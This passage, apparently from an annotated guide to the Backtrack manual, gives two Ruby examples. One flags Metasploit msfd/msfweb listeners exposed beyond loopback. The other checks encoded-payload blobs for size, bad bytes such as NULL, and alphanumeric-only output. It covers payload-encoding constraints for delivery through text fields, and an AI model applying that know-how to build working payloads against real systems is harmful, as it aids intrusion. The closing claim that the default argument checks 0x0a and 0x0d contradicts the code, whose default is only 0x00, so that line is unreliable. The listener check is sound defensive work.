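  local = line.split.find { |f| f =~ /\A(\*|\[?[0-9a-fA-F:.]+\]?):\d+\z/ }
  return nil unless local
  addr, _sep, port = local.rpartition(":")
  [addr.delete("[]"), port.to_i]
end

# Findings for Metasploit services listening on a non-loopback address.
def exposed_msf_listeners(lines)
  lines.filter_map do |line|
    addr, port = parse_listener(line)
    next unless addr && MSF_SERVICES.key?(port)
    next if LOOPBACK.include?(addr)
    { address: addr, port: port, service: MSF_SERVICES[port] }
  end
end

# Human-readable summary of the findings.
def report(lines)
  findings = exposed_msf_listeners(lines)
  return "OK: no Metasploit service bound beyond loopback" if findings.empty?
  findings.map { |f| "EXPOSED #{f[:address]}:#{f[:port]}  #{f[:service]}" }.join("\n")
end

# Constructed sample output in `ss -ltn` layout (not captured from a real host):
# msfrpcd correctly on loopback, msfd on all IPv4 addresses, msfweb on the
# wildcard address, plus an unrelated SSH listener.
SAMPLE_SS_OUTPUT = <<~SS.lines
  State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
  LISTEN 0      128    127.0.0.1:55553     0.0.0.0:*
  LISTEN 0      128    0.0.0.0:55554       0.0.0.0:*
  LISTEN 0      128    *:55555             *:*
  LISTEN 0      128    [::]:22             [::]:*
SS

puts report(SAMPLE_SS_OUTPUT) if $PROGRAM_NAME == __FILE__
```

On a live host, feed it the real output, for example `report(`ss -ltn`.lines)`, and treat any EXPOSED line for 55554 or 55555 as a finding: msfd and msfweb carry no authentication of their own, so their only protection is the bind address.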
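The msfencode and msfpayload sections above state three things about an encoded payload: its size grows (116 bytes to 296 in the manual's run), the NULL byte no longer occurs, and the output can be restricted to alphanumeric characters. The Ruby below is an added example, not code from the manual or from Metasploit, that checks those properties on a blob: it converts msfpayload's C-format output (the "\xNN" string literals) back into bytes, then reports the size, the offsets of any bad bytes and whether the blob is alphanumeric only. The two sample blobs are constructed filler bytes, not payloads, and the function names are this example's own. The same checks serve an analyst deciding whether a captured blob is alphanumeric-encoded.

```ruby
# Added example, not from the Backtrack manual or Metasploit: verify the
# properties the manual attributes to msfencode output (size change, absence of
# bad bytes such as 0x00, alphanumeric-only output). Sample blobs are
# constructed filler, not payloads; function names are this example's own.

# Turn msfpayload's C-format output ("\xNN" string literals, possibly split
# across several quoted fragments inside a declaration) back into raw bytes.
# Only the \xNN escapes are read, so the surrounding C syntax is ignored.
def c_literal_to_bytes(text)
  text.scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |hex| hex.to_i(16) }.pack("C*")
end

# Offsets of every byte that belongs to the bad-character set (default: NULL).
def bad_byte_offsets(blob, bad = [0x00])
  blob.bytes.each_with_index.filter_map { |b, i| i if bad.include?(b) }
end

# True when every byte is an ASCII letter or digit.
def alphanumeric_only?(blob)
  blob.bytes.all? do |b|
    (0x30..0x39).cover?(b) || (0x41..0x5a).cover?(b) || (0x61..0x7a).cover?(b)
  end
end

# One summary hash per blob: the three things an encoder run should change.
def analyse(blob, bad = [0x00])
  {
    size: blob.bytesize,
    bad_offsets: bad_byte_offsets(blob, bad),
    alphanumeric: alphanumeric_only?(blob),
  }
end

# Constructed "raw" sample in msfpayload's C layout: contains two NULL bytes
# and a non-printable 0x90, as an unencoded payload typically would.
RAW_SAMPLE_C = <<~'C'
  unsigned char buf[] =
  "\x41\x00\x42\x43"
  "\x44\x90\x90\x00";
C

# Constructed "encoded" sample: letters and digits only, no NULL byte.
ENCODED_SAMPLE = (("A".."Z").to_a + ("0".."9").to_a).join

if $PROGRAM_NAME == __FILE__
  puts "raw:     #{analyse(c_literal_to_bytes(RAW_SAMPLE_C))}"
  puts "encoded: #{analyse(ENCODED_SAMPLE)}"
end
```

Pass a different `bad` list to match the protocol in question; the manual's example excludes only 0x00, but a payload delivered inside a text field would also need 0x0a and 0x0d checked, which is what the default argument is there for.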